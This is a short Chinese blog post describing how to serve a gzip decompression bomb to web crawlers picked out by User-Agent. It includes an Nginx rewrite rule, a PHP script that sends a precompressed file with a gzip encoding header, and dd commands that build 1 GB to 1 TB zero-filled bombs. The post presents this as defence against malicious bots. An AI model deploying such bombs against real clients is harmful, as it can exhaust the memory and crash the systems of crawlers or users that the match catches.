机器人UA 返回炸弹文件

机器人UA 返回炸弹文件

Fate
2021-06-14 / 1 评论 / 158 阅读 / 正在检测是否收录...

1.修改 Nginx伪静态 填写相关目标代理。

2.修改 Nginx伪静态 PHP文件目录,可以不修改。

3.生成的 PHP文件 和 炸弹文件 需要在一个目录下。

实际1G压缩成1M大小的文件炸弹,服务器的话就是发送了1M的文件。

恶意程序请求后会自动解包为1G的数据,可以对恶意程序造成很大的压力。

Nginx伪静态

location / {
  #UA BOMB
  if ($http_user_agent ~* "(#填写相关#|#目标代理#)") {
    rewrite ^/.*  /bomb.php last;
  }
}

PHP文件

<?php
header('Content-Encoding: gzip');
echo file_get_contents('1G.gzip');

炸弹文件

#1G数据文件#
dd if=/dev/zero bs=1M count=1024 | gzip > 1G.gzip
#10G数据文件#
dd if=/dev/zero bs=1M count=10240 | gzip > 10G.gzip
#1024G数据文件#
dd if=/dev/zero bs=1M count=1048576 | gzip > 1T.gzip
1

评论

博主关闭了所有页面的评论